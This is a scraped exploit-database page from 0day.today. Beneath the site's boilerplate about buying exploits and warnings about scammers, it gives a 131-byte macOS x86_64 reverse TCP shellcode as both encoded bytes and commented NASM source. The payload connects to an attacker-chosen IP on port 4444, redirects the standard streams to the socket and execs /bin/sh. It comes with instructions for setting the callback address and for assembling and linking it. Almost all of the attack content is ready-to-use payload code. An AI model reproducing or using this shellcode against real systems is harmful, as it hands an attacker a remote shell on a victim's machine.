0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
os-x/x86 intel reverse_tcp shell x86_64 - 131 bytes
;osx x64 reverse tcp shellcode (131 bytes) ;Jacob Hammack ;jacob.hammack@hammackj.com ;http://www.hammackj.com ; ;props to http://www.thexploit.com/ for the blog posts on x64 osx asm ;I borrowed some of his code ; ;#OSX reverse tcp shell (131 bytes) ;#replace FFFFFFFF around byte 43 with the call back ip in hex ;#replace 5C11 around byte 39 with a new port current is 4444 ;shellcode = ;"\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48" + ;"\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F" + ;"\x05\x49\x89\xC4\x49\xBD\x01\x01\x11\x5C\xFF\xFF\xFF\xFF\x41" + ;"\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89" + ;"\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83" + ;"\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83" + ;"\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48" + ;"\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED" + ;"\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05" ;nasm -f macho reverse_tcp.s -o reverse_tcp.o ;ld -o reverse_tcp -e start reverse_tcp.o BITS 64 section .text global start start: mov r8b, 0x02 ; unix class system calls = 2 shl r8, 24 ; shift left 24 to the upper order bits or r8, 0x61 ; socket is 0x61 mov rax, r8 ; put socket syscall # into rax ;Socket xor rdx, rdx ; zero out rdx mov rsi, rdx ; AF_NET = 1 inc rsi ; rsi = AF_NET mov rdi, rsi ; SOCK_STREAM = 2 inc rdi ; rdi = SOCK_STREAM syscall ; call socket(SOCK_STREAM, AF_NET, 0); mov r12, rax ; Save the socket ;Sock_addr mov r13, 0xFFFFFFFF5C110101 ; IP = FFFFFFFF, Port = 5C11(4444) mov r9b, 0xFF ; The sock_addr_in is + FF from where we need it sub r13, r9 ; So we sub 0xFF from it to get the correct value and avoid a null push r13 ; Push it on the stack mov r13, rsp ; Save the sock_addr_in into r13 ;Connect inc r8 ; Connect = 0x62, so we inc by one from the previous syscall mov rax, r8 ; move that into rax mov rdi, r12 ; move the saved socket fd into rdi mov rsi, r13 ; move the saved sock_addr_in into rsi add rdx, 0x10 ; add 0x10 to rdx syscall ; call connect(rdi, rsi, rdx) sub r8, 0x8 ; subtract 8 from r8 for the next syscall dup2 0x90 xor rsi, rsi ; zero out rsi dup: mov rax, r8 ; move the syscall for dup2 into rax mov rdi, r12 ; move the FD for the socket into rdi syscall ; call dup2(rdi, rsi) cmp rsi, 0x2 ; check to see if we are still under 2 inc rsi ; inc rsi jbe dup ; jmp if less than 2 sub r8, 0x1F ; setup the exec syscall at 0x3b mov rax, r8 ; move the syscall into rax ;exec xor rdx, rdx ; zero out rdx mov r13, 0x68732f6e69622fFF ; '/bin/sh' in hex shr r13, 8 ; shift right to create the null terminator push r13 ; push to the stack mov rdi, rsp ; move the command from the stack to rdi xor rsi, rsi ; zero out rsi syscall ; call exec(rdi, 0, 0) # 0day.today [2024-12-23] #